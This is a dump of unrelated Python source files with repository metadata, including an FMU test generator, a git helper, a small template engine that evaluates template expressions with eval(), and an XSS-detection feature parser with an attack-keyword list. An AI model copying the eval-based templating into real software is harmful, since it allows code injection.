if not os.path.exists(fullPath):
print("Directory '{}' does not exist.".format(fullPath))
exit(1)
# check if target directory exists, otherwise attempt to create it
msimFullPath = os.path.abspath(MSIM_DIRECTORY)
if os.path.exists(msimFullPath):
if os.path.isfile(msimFullPath):
print("Target directory '{}' exists as file.".format(msimFullPath))
exit(1)
else:
os.mkdir(msimFullPath)
if not os.path.exists(msimFullPath):
print("Cannot create target directory '{}'.".format(msimFullPath))
exit(1)
# now parse file list and generate project files
fmuList = []
print("Collecting list of FMUs to import and test-run")
# filter out platform, if given
osType = args.platform
if osType == None:
s = platform.system()
if s == "Linux":
osType = "linux64"
elif s == "Windows":
print("Selecting 'win64' platform")
osType = "win64"
else:
osType = "darwin64"
for root, dirs, files in os.walk(fullPath, topdown=False):
root = os.path.join(fullPath, root) # full path to current fmu file
rootStr = root.replace('\\', '/') # windows fix
pathParts = rootStr.split('/') # split into component
pathParts = pathParts[len(fullPathParts):] # keep only path parts below toplevel dir
# we only process directories that can actually contain models, that means more than 4 path parts
if len(pathParts) < 5:
continue
relPath = '/'.join(pathParts[1:]) # compose relative path
# filter out everything except the fmus sub-directory
if pathParts[0] != "fmus":
continue
# filter out Model Exchange fmus
if pathParts[2] == "me":
continue
# filter out fmi version if given
if args.fmiVersion != None:
found = False
if args.fmiVersion == "1" and pathParts[1] == "1.0":
found = True
if args.fmiVersion == "2" and pathParts[1] == "2.0":
found = True
if not found:
continue
if pathParts[3] != osType:
continue
# filter out vendor/tool, if given
if args.tool != None and pathParts[4] != args.tool:
continue
# now find .fmu files
for name in files:
e = os.path.splitext(name)
if len(e) == 2 and e[1] == '.fmu':
fmuPath = os.path.join(root, name)
fmuCase = fmuPath[:-4] # strip the trailing .fmu
# generate path to target directory, hereby substitute / with _ so that we only have one directory level
relPath = os.path.split(os.path.relpath(fmuCase, fullPath))[0] # get relative path to directory with fmu file
relPath = relPath.replace('\\', '_') # windows fix
relPath = relPath.replace('/', '_')
relPath = MSIM_DIRECTORY + '/' + relPath
# create directory if not existing
if not os.path.exists(relPath):
os.mkdir(relPath)
# setup test generator (parse input files)
try:
masterSim = msimGenerator.MasterSimTestGenerator()
masterSim.setup(fmuCase)
except Exception as e:
print(e)
# create a 'fail' file with error message
with open(relPath + "/rejected", 'w') as file:
file.write(str(e) + "\n")
continue
# generate MasterSim file
if not masterSim.generateMSim(relPath, pathParts[1]=="1.0"):
continue # MasterSim project file exists already, skip FMU
relPathFMUStr = os.path.join(relPath, name)
print(relPathFMUStr + " processed...")
print("MasterSim project files regenerated.")
| [
"ghorwin@dd098b5a-9c97-4e98-abe7-e951c7a10ce5"
] | ghorwin@dd098b5a-9c97-4e98-abe7-e951c7a10ce5 |
e280ebb8627684e99bd5176969d872b102c80446 | a301b758065ea4040533d21f9bf322a084e0689c | /wandb/internal/git_repo.py | 3a5e935b7105a9d2ccc0437710b644434cc40be9 | [] | no_license | nitin-test/client-ng | 813448c810698759760b3d842afbf91387c9ed41 | cde060e54caa99e4288cee17f15978ba647c7d04 | refs/heads/master | 2022-12-13T04:45:09.134606 | 2020-08-12T01:32:37 | 2020-08-12T01:32:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,495 | py | import logging
import os
from six.moves import configparser
logger = logging.getLogger(__name__)
class GitRepo(object):
def __init__(self, root=None, remote="origin", lazy=True):
self.remote_name = remote
self._root = root
self._repo = None
if not lazy:
self.repo
@property
def repo(self):
if self._repo is None:
if self.remote_name is None:
self._repo = False
else:
try:
self._repo = Repo(
self._root or os.getcwd(), search_parent_directories=True
)
except exc.InvalidGitRepositoryError:
logger.debug("git repository is invalid")
self._repo = False
return self._repo
def is_untracked(self, file_name):
if not self.repo:
return True
return file_name in self.repo.untracked_files
@property
def enabled(self):
return bool(self.repo)
@property
def root(self):
if not self.repo:
return False
return self.repo.git.rev_parse("--show-toplevel")
@property
def dirty(self):
if not self.repo:
return False
return self.repo.is_dirty()
@property
def email(self):
if not self.repo:
return None
try:
return self.repo.config_reader().get_value("user", "email")
except configparser.Error:
return None
@property
def last_commit(self):
if not self.repo:
return None
if not self.repo.head or not self.repo.head.is_valid():
return None
if len(self.repo.refs) > 0:
return self.repo.head.commit.hexsha
else:
return self.repo.git.show_ref("--head").split(" ")[0]
@property
def branch(self):
if not self.repo:
return None
return self.repo.head.ref.name
@property
def remote(self):
if not self.repo:
return None
try:
return self.repo.remotes[self.remote_name]
except IndexError:
return None
# the --submodule=diff option doesn't exist in pre-2.11 versions of git (november 2016)
# https://stackoverflow.com/questions/10757091/git-list-of-all-changed-files-including-those-in-submodules
@property
def has_submodule_diff(self):
if not self.repo:
return False
return self.repo.git.version_info >= (2, 11, 0)
@property
def remote_url(self):
if not self.remote:
return None
return self.remote.url
@property
def root_dir(self):
if not self.repo:
return None
return self.repo.git.rev_parse("--show-toplevel")
def get_upstream_fork_point(self):
"""Get the most recent ancestor of HEAD that occurs on an upstream
branch.
First looks at the current branch's tracking branch, if applicable. If
that doesn't work, looks at every other branch to find the most recent
ancestor of HEAD that occurs on a tracking branch.
Returns:
git.Commit object or None
"""
possible_relatives = []
try:
if not self.repo:
return None
try:
active_branch = self.repo.active_branch
except (TypeError, ValueError):
logger.debug("git is in a detached head state")
return None # detached head
else:
tracking_branch = active_branch.tracking_branch()
if tracking_branch:
possible_relatives.append(tracking_branch.commit)
if not possible_relatives:
for branch in self.repo.branches:
tracking_branch = branch.tracking_branch()
if tracking_branch is not None:
possible_relatives.append(tracking_branch.commit)
head = self.repo.head
most_recent_ancestor = None
for possible_relative in possible_relatives:
# at most one:
for ancestor in self.repo.merge_base(head, possible_relative):
if most_recent_ancestor is None:
most_recent_ancestor = ancestor
elif self.repo.is_ancestor(most_recent_ancestor, ancestor):
most_recent_ancestor = ancestor
return most_recent_ancestor
except exc.GitCommandError as e:
logger.debug("git remote upstream fork point could not be found")
logger.debug(e.message)
return None
def tag(self, name, message):
try:
return self.repo.create_tag("wandb/" + name, message=message, force=True)
except exc.GitCommandError:
print("Failed to tag repository.")
return None
def push(self, name):
if self.remote:
try:
return self.remote.push("wandb/" + name, force=True)
except exc.GitCommandError:
logger.debug("failed to push git")
return None
class FakeGitRepo(GitRepo):
@property
def repo(self):
return None
try:
from git import Repo, exc # type: ignore
except ImportError: # import fails if user doesn't have git
GitRepo = FakeGitRepo # type: ignore
| [
"noreply@github.com"
] | nitin-test.noreply@github.com |
326f5de126d44ed5c242cb25b5cef8c4788a9c97 | fffcc24d7c3fbadd615db1c2de632ebec72b92da | /cgi-bin/simpletemplate.py | 3551d703604abe395986350f77e0ad80b887ef96 | [] | no_license | kimihito/minpy | 35a5cf1596979e3bc57d6bfb6fcded03ae10f0d3 | 6273d43f65279d800a37a5dd9b34488d2cea54a1 | refs/heads/master | 2016-08-08T02:10:02.967527 | 2012-06-11T13:57:23 | 2012-06-11T13:57:23 | 4,147,292 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,517 | py | #!/usr/bin/env python
# coding: utf-8
import re
if_pat=re.compile(r"\$if\s+(.*\:)")
endif_pat=re.compile(r"\$endif")
for_pat=re.compile(r"\$for\s+(.*)\s+in\s+(.*\:)")
endfor_pat=re.compile(r"\$endfor")
value_pat=re.compile(r"\${(.+?)}")
class SimpleTemplate(object):
"""
シンプルな機能を持つテンプレートエンジン
"""
def __init__(self, body='', file_path=None):
"""
初期化メソッド
"""
if file_path:
f=open(file_path)
body=unicode(f.read(), 'utf-8', 'ignore')
body=body.replace('\r\n', '\n')
self.lines = body.split('\n')
self.sentences = ((if_pat, self.handle_if),
(for_pat, self.handle_for),
(value_pat, self.handle_value),)
def render(self, kws={}):
"""
テンプレートをレンダリングする
"""
l, o=self.process(kws=kws)
return o
def find_matchline(self, pat, start_line=0):
"""
正規表現を受け取り,マッチする行の行数を返す
"""
cur_line=start_line
for line in self.lines[start_line:]:
if pat.search(line):
return cur_line
cur_line+=1
return -1
def process(self, exit_pats=(), start_line=0, kws={}):
"""
テンプレートのレンダリング処理をする
"""
output=u''
cur_line=start_line
while len(self.lines) > cur_line:
line=self.lines[cur_line]
for exit_pat in exit_pats:
if exit_pat.search(line):
return cur_line+1, output
for pat, handler in self.sentences:
m=pat.search(line)
pattern_found=False
if m:
try:
cur_line, out=handler(m, cur_line, kws)
pattern_found=True
output+=out
break
except Exception, e:
raise e #Exception("Following error occured in line %d\n%s" % (cur_line, str(e)))
if not pattern_found:
output+=line+'\n'
cur_line+=1
if exit_pats:
raise "End of lines while parsing"
return cur_line, output
def handle_value(self, _match, _line_no, _kws={}):
"""
${...}を処理する
"""
_line=self.lines[_line_no]
_rep=[]
locals().update(_kws)
pos=0
while True:
_m=value_pat.search(_line[pos:])
if not _m:
break
pos+=_m.end()
_rep.append( (_m.group(1), unicode(eval(_m.group(1)))) )
for t, r in _rep:
_line=_line.replace('${%s}'%t, r)
return _line_no, _line+'\n'
def handle_if(self, _match, _line_no, _kws={}):
"""
$ifを処理する
"""
_cond=_match.group(1)
if not _cond:
raise "SyntaxError: invalid syntax in line %d" % line_no
_cond=_cond[:-1]
locals().update(_kws)
_line, _out=self.process((endif_pat, ), _line_no+1, _kws)
if not eval(_cond):
_out=''
return _line-1, _out
def handle_for(self, _match, _line_no, _kws={}):
"""
$forを処理する
"""
_var=_match.group(1)
_exp=_match.group(2)
if not _var or not _exp:
raise "SyntaxError: invalid syntax in line %d" % line_no
locals().update(_kws)
_seq=eval(_exp[:-1])
_out=''
if not _seq:
return self.find_matchline(endfor_pat, _line_no), _out
for _v in _seq:
_kws.update({_var:_v})
_line, _single_out=self.process((endfor_pat, ), _line_no+1, _kws)
_out+=_single_out
return _line-1, _out
def main():
t=SimpleTemplate("""aaaa
$if 1==1:
if clause0
$endif
$if 1==1:
if clause1
$if 1==1:
if clause1-2
$endif
$else:
else clause1
$endif
$if 1==1:
if clause2
$endif
$if 1==2:
if clause3
$else:
else clause3
$endif
bbbb
""")
print t.render()
print "-"*40
t=SimpleTemplate("""
<select name="fruit">
$for val in ["Apple", "Banana", "Melon"]:
<optioin value="${val}">${val}</option>
$endfor
</select>
""")
print t.render()
if __name__=='__main__':
"""
import pdb
pdb.run('main()')
"""
main()
| [
"tatsurotamashiro@gmail.com"
] | tatsurotamashiro@gmail.com |
7f329a56f3c63d6f634c341fe1ee1a609f562304 | eef39fd96ef4ed289c1567f56fde936d5bc42ea4 | /BaekJoon/Bronze2/15969.py | 803573cbb6d19798b9968fcd14d2be7454bafc32 | [] | no_license | dudwns9331/PythonStudy | 3e17da9417507da6a17744c72835c7c2febd4d2e | b99b9ef2453af405daadc6fbf585bb880d7652e1 | refs/heads/master | 2023-06-15T12:19:56.019844 | 2021-07-15T08:46:10 | 2021-07-15T08:46:10 | 324,196,430 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,452 | py | # 행복
"""
2021-01-22 오전 1:37
안영준
문제
코이 초등학교에 새로 부임하신 교장 선생님은 어린 학생들의 행복감과 학생들의 성적 차이 관계를 알아보기로 했다.
그래서 이전 성적을 조사하여 학생 들의 시험 점수 차이 변화를 알아보려고 한다.
예를 들어서 2016년 학생 8명의 점수가 다음과 같다고 하자.
27, 35, 92, 75, 42, 53, 29, 87
그러면 가장 높은 점수는 92점이고 가장 낮은 점수는 27점이므로 점수의 최대 차이는 65이다.
한편 2017년 학생 8명의 점수가 다음과 같았다.
85, 42, 79, 95, 37, 11, 72, 32
이때 가장 높은 점수는 95점이고 가장 낮은 점수는 11점이므로 점수의 최대 차이는 84이다.
N명 학생들의 점수가 주어졌을 때, 가장 높은 점수와 가장 낮은 점수의 차이를 구하는 프로그램을 작성하시오.
입력
표준 입력으로 다음 정보가 주어진다. 첫 번째 줄에는 학생 수 N이 주어진다. 다음 줄에는 N명의 학생 점수가 공백 하나를 사이에 두고 주어진다.
출력
표준 출력으로 가장 높은 점수와 가장 낮은 점수의 차이를 출력한다.
제한
모든 서브태스크에서 2 ≤ N ≤ 1,000이고 입력되는 학생들의 점수는 0 이상 1,000 이하의 정수이다.
"""
N = int(input())
score = list(map(int, input().split()))
score.sort()
print(score[-1] - score[0])
| [
"dudwns1045@naver.com"
] | dudwns1045@naver.com |
be53837e6f881208f6caffce7dcad68d8a4b39b7 | 37c6b326c3547c7ff89ade627d7d5a35a9d03025 | /Parser.py | 74c4d69c1b2da1b4cba092788d855321d1a8ed86 | [] | no_license | este6an13/XSSTrackerServers | e30836a203d6aecea0ac6f931aef09f91ce9096b | 191f67ee04ce853f129fd1e71d446e0c0709e4d6 | refs/heads/master | 2023-06-14T22:44:00.927187 | 2021-07-14T01:44:37 | 2021-07-14T01:44:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,789 | py | #import requests
#from bs4 import BeautifulSoup
# import re
from urllib.parse import urlparse
import esprima
class Parser():
keywords = ['XSS', 'banking', 'redirect', 'root', 'password', 'crypt',
'shell', 'spray', 'evil']
def url_len(self, url):
return len(url)
def html_len(self, html):
return len(html)
def url_spec_char(self, url):
return 1 if any(c in '[@_!#$%^*()<>\|}{~]' for c in url) else 0
def url_tag(self, url, tag):
tags = ['<'+tag+'>', '</'+tag+'>', '%3C'+tag+'%3E', '%3C%2F'+tag+'%3E']
return 1 if any(t in url for t in tags) else 0
def url_substr(self, url, substr):
return 1 if substr in url else 0
def url_params_count(self, url):
u = urlparse(url)
query = u.query
return 0 if query == '' else len(query.split('&'))
def url_domain_count(self, url):
# return len(re.search(r'^[^:]+://([^/]+)', url).group(1).split('.'))
u = urlparse(url)
return len(u.hostname.split('.'))
def html_tag_count(self, soup, tag):
return len(soup.find_all(tag))
def html_attr_count(self, soup, attr):
tags = soup.find_all()
return [t.has_attr(attr) for t in tags].count(True)
def html_event_count(self, soup, event):
tags = soup.find_all()
return [t.has_attr(event) for t in tags].count(True)
def html_keywords(self, html):
count = 0
for k in self.keywords:
count += html.count(k)
return count
def js_file(self, soup):
scripts = soup.find_all('script')
for s in scripts:
try:
if s['src'].split('.')[-1] == 'js':
return 1
except:
pass
return 0
def pseudo_protocol(self, soup):
anchors = soup.find_all('a')
for a in anchors:
try:
if a['href'].split(':')[0] == 'javascript':
return 1
except:
pass
return 0
def js_prop_count(self, soup, prop):
count = 0
scripts = soup.find_all('script')
for s in scripts:
try:
tokens = esprima.tokenize(str(s.string))
for t in tokens:
idx = tokens.index(t)
if t.value == prop:
count += 1
except:
pass
return count
def js_document_obj_count(self, soup):
count = 0
scripts = soup.find_all('script')
for s in scripts:
try:
tokens = esprima.tokenize(str(s.string))
for t in tokens:
idx = tokens.index(t)
if t.value == 'document':
count += 1
except:
pass
return count
def js_method_count(self, soup, method):
count = 0
scripts = soup.find_all('script')
for s in scripts:
try:
tokens = esprima.tokenize(str(s.string))
for t in tokens:
idx = tokens.index(t)
if t.value == method:
count += 1
except:
pass
return count
def js_min_len(self, soup):
min = float('inf')
scripts = soup.find_all('script')
for s in scripts:
length = len(str(s.string))
if length < min:
min = length
return 0 if min == float('inf') else min
def js_max_len(self, soup):
max = 0
scripts = soup.find_all('script')
for s in scripts:
length = len(str(s.string))
if length > max:
max = length
return max
def js_min_function_call(self, soup):
min = float('inf')
scripts = soup.find_all('script')
for s in scripts:
tree = {}
try:
tree = esprima.parseScript(str(s.string))
except:
pass
treestr = str(esprima.toDict(tree))
count = treestr.count('CallExpression')
if count < min:
min = count
return 0 if min == float('inf') else min
def js_min_function_def(self, soup):
min = float('inf')
scripts = soup.find_all('script')
for s in scripts:
tree = {}
try:
tree = esprima.parseScript(str(s.string))
except:
pass
treestr = str(esprima.toDict(tree))
count = treestr.count('FunctionDeclaration')
if count < min:
min = count
return 0 if min == float('inf') else min
| [
"diego.quintero@sitel.com"
] | diego.quintero@sitel.com |
d830da1f9d9e07fe504090cca4bc6f96ec19b136 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/SsdataDataserviceRiskAntifraudscoreQueryResponse.py | eb88453a0ac5e908d0040c632adda75bafe8c3cc | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,247 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class SsdataDataserviceRiskAntifraudscoreQueryResponse(AlipayResponse):
def __init__(self):
super(SsdataDataserviceRiskAntifraudscoreQueryResponse, self).__init__()
self._biz_no = None
self._score = None
self._unique_id = None
@property
def biz_no(self):
return self._biz_no
@biz_no.setter
def biz_no(self, value):
self._biz_no = value
@property
def score(self):
return self._score
@score.setter
def score(self, value):
self._score = value
@property
def unique_id(self):
return self._unique_id
@unique_id.setter
def unique_id(self, value):
self._unique_id = value
def parse_response_content(self, response_content):
response = super(SsdataDataserviceRiskAntifraudscoreQueryResponse, self).parse_response_content(response_content)
if 'biz_no' in response:
self.biz_no = response['biz_no']
if 'score' in response:
self.score = response['score']
if 'unique_id' in response:
self.unique_id = response['unique_id']
| [
"liuqun.lq@alibaba-inc.com"
] | liuqun.lq@alibaba-inc.com |
4688bc5cb098e3bd45c811d3ce8103e7115bcac9 | e9bb041494a13478ce8a1561e6f762d971938cf9 | /icsv/tests/writeReadTests.py | da371d69505b69730f40531fa2a0a68abca05727 | [
"MIT"
] | permissive | bponsler/icsv | f960e482a0506a87bd5a2d1ada6642065781cacd | 3f306bf1cf69c1cad87f051424fcb985cba65e96 | refs/heads/master | 2016-09-06T10:20:31.184798 | 2015-04-22T15:53:57 | 2015-04-22T15:53:57 | 12,776,696 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,580 | py | from os import unlink
from os.path import exists
from unittest import TestCase
from icsv import icsv, Row
class WriteReadTests(TestCase):
def setUp(self):
pass
def test_filter(self):
filename = "/tmp/testCsv.csv"
headers = ["one", "two", "three"]
csv = icsv(headers)
self.assertTrue(csv is not None)
self.assertEqual(csv.headers(), headers)
self.assertEqual(csv.delimiter(), ',')
rows = [
[0, 1, 2],
[3, 4, 5],
["hello", 1, True],
[1, False, "world"],
]
# Write all of the data to the file
for row in rows:
csv.addRow(row)
self.assertEqual(csv.numRows(), 4)
# Save the file
writer = csv.write(filename)
self.assertTrue(writer is not None)
# Read the same CSV
reader = csv.fromFile(filename, headers)
self.assertTrue(reader is not None)
# Compare the read data to the original
self.assertEqual(reader.numRows(), csv.numRows())
self.assertEqual(reader.numCols(), csv.numCols())
self.assertEqual(reader.headers(), csv.headers())
for index in range(len(rows)):
read = reader.getRow(index)
# Read data will be all strings
original = list(map(str, csv.getRow(index).list()))
expected = list(map(str, rows[index]))
for index in range(len(original)):
self.assertEqual(original[index], expected[index])
self.assertEqual(read.list(), expected)
| [
"ponsler@gmail.com"
] | ponsler@gmail.com |
8be84e7b162f60f07b18a5be2552aa8024cb5c75 | 336f751d1730e17b7fd4b645805988c3a30017d3 | /notes/serializers.py | b68bf8451fb92dc23bf5af3b730f313201e7cafc | [] | no_license | BasicPixel/marknote-live | 4a71905b341292630ca68b2988d82b17b389a5a9 | cb16ded8627859de23a62264d730c1a23af416ed | refs/heads/master | 2023-07-01T14:48:06.101120 | 2021-08-16T07:24:11 | 2021-08-16T07:24:11 | 396,673,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from rest_framework import serializers
from .models import *
class NoteSerializer(serializers.ModelSerializer):
class Meta:
model = Note
fields = '__all__'
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = '__all__'
| [
"69857856+BasicPixel@users.noreply.github.com"
] | 69857856+BasicPixel@users.noreply.github.com |
02da9c8b6242405e3f94f40ba7c4cb887583b3d9 | c2097c731cdfc57c8901437b27dcb5791bcd20f0 | /for loop.py | e64dc37592e8a4984acf129d1c9fdc74fb27e66e | [] | no_license | louismatsika/python | bf66250587febc90e0cbed5bceeca2ba934d77e2 | d7c87b2cd884ee549b4383a552f64c64e3e4a2ad | refs/heads/master | 2020-04-07T00:08:09.185213 | 2018-11-16T16:41:11 | 2018-11-16T16:41:11 | 157,892,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43 | py | for n in range (10):
print("loop",n)
| [
"noreply@github.com"
] | louismatsika.noreply@github.com |
7276838d2d32ee2a9bf909e88d930f4a84c9622f | 22e63f90d0ce8f03ac211b27735a1bac82b7401e | /mysite/blog/models.py | b065351bd518ea378bc615817607118a787661a3 | [] | no_license | binarever/Django | b4fc6673c5a5f06cfc4f903001b9b1886dc52961 | e86897f160c8e6085c27e78c493453dd246b9481 | refs/heads/master | 2020-12-02T17:40:33.626407 | 2017-07-06T08:47:39 | 2017-07-06T08:47:39 | 96,408,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
# Create your models here.
class Post(models.Model):
STATUS_CHOICES=(
('draft','Draft'),
('published','Published'),
)
title=models.CharField(max_length=250)
slug=models.SlugField(max_length=250,unique_for_date='publish')
author=models.ForeignKey(User,related_name='blog_posts')
body=models.TextField()
publish=models.DateTimeField(default=timezone.now)
created=models.DateTimeField(auto_now_add=True)
updated=models.DateTimeField(auto_now=True)
status=models.CharField(max_length=10,choices=STATUS_CHOICES,default='draft')
class meta:
ordering=('-publish',)
def __unicode__(self):
return self.title
| [
"2360566454@qq.com"
] | 2360566454@qq.com |
90ba45a70b9dff2d3a4a23b4d0c354dc2f9321ac | 3314fb1c0104b39af03126ff418385cd348040bc | /tests/test_default.py | cf610432e3aaf1efa440a42fa7fb500ba5a10612 | [] | no_license | viniciusfs/ansible-role-tomcat | 4b174408aaa0f479609b9a9a34a9f70d1caf5086 | dce442c095e3fd97246222835fa68bc474b2a42d | refs/heads/master | 2020-05-23T07:59:50.334435 | 2017-02-03T18:03:38 | 2017-02-03T18:03:38 | 80,482,410 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,045 | py | import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
'.molecule/ansible_inventory').get_hosts('all')
def test_tomcat_group(Group):
tomcat = Group('tomcat')
assert tomcat.exists
assert tomcat.gid == 215
def test_tomcat_user(User):
tomcat = User('tomcat')
assert tomcat.exists
assert tomcat.uid == 215
assert tomcat.group == 'tomcat'
assert tomcat.home == '/opt/tomcat'
def test_tomcat_directory(File):
tomcat_directory = File('/opt/apache-tomcat-7.0.75')
assert tomcat_directory.exists
assert tomcat_directory.is_directory
def test_tomcat_home(File):
tomcat_home = File('/opt/tomcat')
assert tomcat_home.exists
assert tomcat_home.is_symlink
assert tomcat_home.linked_to == '/opt/apache-tomcat-7.0.75'
def test_tomcat_started_enabled(Service):
tomcat = Service('tomcat')
assert tomcat.is_running
assert tomcat.is_enabled
def test_tomcat_port(Socket):
assert Socket("tcp://0.0.0.0:8080").is_listening
| [
"viniciusfs@gmail.com"
] | viniciusfs@gmail.com |
19e567714b4187da2231b288858d1595bd421c34 | b2e0aaa09ada3335d44860bd15d0e8fd8182d332 | /palindrome.py | 0f4820a097ceb43aded774a1a420c1c3dcd3dda6 | [] | no_license | udayraj333/python3 | 7bff91ef8b76a589c4f22bc3516322df3e0e6ef3 | d8b07a85a8697de8b79079bab36597669fa0954b | refs/heads/master | 2022-07-23T19:10:49.247880 | 2020-02-01T14:46:32 | 2020-02-01T14:46:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py |
num=(input("Enter a number:"))
temp=num
rev=0
while(num>0):
dig=num%10
rev=rev*10+dig
num=num//10
if(temp==rev):
print("The number is palindrome!")
else:
print("Not a palindrome!")
| [
"noreply@github.com"
] | udayraj333.noreply@github.com |
675dda5c8c83bf0f987ede0d78116c521d6932a4 | a6c0bb39fe1f5218094f9d8a728d32c7348414b8 | /timesformer_pytorch/timesformer_pytorch.py | dfbbfbb447de3d906549636f03dc5833d4f4c0ce | [
"MIT"
] | permissive | Willforcv/TimeSformer-pytorch | 042f23cd4e02e973fc0374579f18a4b529309edb | 4e4a60d4876a45cceddcf8af514eb39eac40ff96 | refs/heads/main | 2023-03-20T16:54:42.934377 | 2021-03-21T19:14:02 | 2021-03-21T19:14:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,494 | py | import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange, repeat
# classes
class RMSNorm(nn.Module):
def __init__(self, dim, eps = 1e-8):
super().__init__()
self.scale = dim ** -0.5
self.eps = eps
self.g = nn.Parameter(torch.ones(1))
def forward(self, x):
norm = torch.norm(x, dim = -1, keepdim = True) * self.scale
return x / norm.clamp(min = self.eps) * self.g
class PreNorm(nn.Module):
def __init__(self, dim, fn):
super().__init__()
self.fn = fn
self.norm = RMSNorm(dim)
def forward(self, x, *args, **kwargs):
x = self.norm(x)
return self.fn(x, *args, **kwargs)
# feedforward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, mult = 4, dropout = 0.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x):
return self.net(x)
# attention
def attn(q, k, v):
sim = einsum('b i d, b j d -> b i j', q, k)
attn = sim.softmax(dim = -1)
out = einsum('b i j, b j d -> b i d', attn, v)
return out
class Attention(nn.Module):
def __init__(
self,
dim,
dim_head = 64,
heads = 8,
dropout = 0.
):
super().__init__()
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = dim_head * heads
self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)
self.to_out = nn.Sequential(
nn.Linear(inner_dim, dim),
nn.Dropout(dropout)
)
def forward(self, x, einops_from, einops_to, **einops_dims):
h = self.heads
q, k, v = self.to_qkv(x).chunk(3, dim = -1)
q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> (b h) n d', h = h), (q, k, v))
q *= self.scale
# splice out classification token at index 1
(cls_q, q_), (cls_k, k_), (cls_v, v_) = map(lambda t: (t[:, 0:1], t[:, 1:]), (q, k, v))
# let classification token attend to key / values of all patches across time and space
cls_out = attn(cls_q, k, v)
# rearrange across time or space
q_, k_, v_ = map(lambda t: rearrange(t, f'{einops_from} -> {einops_to}', **einops_dims), (q_, k_, v_))
# expand cls token keys and values across time or space and concat
r = q_.shape[0] // cls_k.shape[0]
cls_k, cls_v = map(lambda t: repeat(t, 'b () d -> (b r) () d', r = r), (cls_k, cls_v))
k_ = torch.cat((cls_k, k_), dim = 1)
v_ = torch.cat((cls_v, v_), dim = 1)
# attention
out = attn(q_, k_, v_)
# merge back time or space
out = rearrange(out, f'{einops_to} -> {einops_from}', **einops_dims)
# concat back the cls token
out = torch.cat((cls_out, out), dim = 1)
# merge back the heads
out = rearrange(out, '(b h) n d -> b n (h d)', h = h)
# combine heads out
return self.to_out(out)
# main classes
class TimeSformer(nn.Module):
def __init__(
self,
*,
dim,
num_frames,
num_classes,
image_size = 224,
patch_size = 16,
channels = 3,
depth = 12,
heads = 8,
dim_head = 64,
attn_dropout = 0.,
ff_dropout = 0.
):
super().__init__()
assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.'
num_patches = (image_size // patch_size) ** 2
num_positions = num_frames * num_patches
patch_dim = channels * patch_size ** 2
self.patch_size = patch_size
self.to_patch_embedding = nn.Linear(patch_dim, dim)
self.pos_emb = nn.Embedding(num_positions + 1, dim)
self.cls_token = nn.Parameter(torch.randn(1, dim))
self.layers = nn.ModuleList([])
for _ in range(depth):
self.layers.append(nn.ModuleList([
PreNorm(dim, Attention(dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, Attention(dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, FeedForward(dim, dropout = ff_dropout))
]))
self.to_out = nn.Sequential(
RMSNorm(dim),
nn.Linear(dim, num_classes)
)
def forward(self, video):
b, f, _, h, w, *_, device, p = *video.shape, video.device, self.patch_size
assert h % p == 0 and w % p == 0, f'height {h} and width {w} of video must be divisible by the patch size {p}'
n = (h // p) * (w // p)
video = rearrange(video, 'b f c (h p1) (w p2) -> b (f h w) (p1 p2 c)', p1 = p, p2 = p)
tokens = self.to_patch_embedding(video)
cls_token = repeat(self.cls_token, 'n d -> b n d', b = b)
x = torch.cat((cls_token, tokens), dim = 1)
x += self.pos_emb(torch.arange(x.shape[1], device = device))
for (time_attn, spatial_attn, ff) in self.layers:
x = time_attn(x, 'b (f n) d', '(b n) f d', n = n) + x
x = spatial_attn(x, 'b (f n) d', '(b f) n d', f = f) + x
x = ff(x) + x
cls_token = x[:, 0]
return self.to_out(cls_token)
| [
"lucidrains@gmail.com"
] | lucidrains@gmail.com |
a855cee959d104206a96609e4dc5641803ff210f | 622d20757e954d3af1b908d78182cf4ac033aa46 | /snippets/views.py | f92186751a7723a0ac5fd71c918b212a9397de1b | [] | no_license | bahatiphill/drf-pastebin | 7fd5e52423c93b73c6e323bdaae3fb515de5b914 | 57b58033cefcd515c0a292d23fe474a208bd45a3 | refs/heads/main | 2023-01-02T09:15:23.409128 | 2020-10-21T19:16:52 | 2020-10-21T19:16:52 | 306,122,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,699 | py | #from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
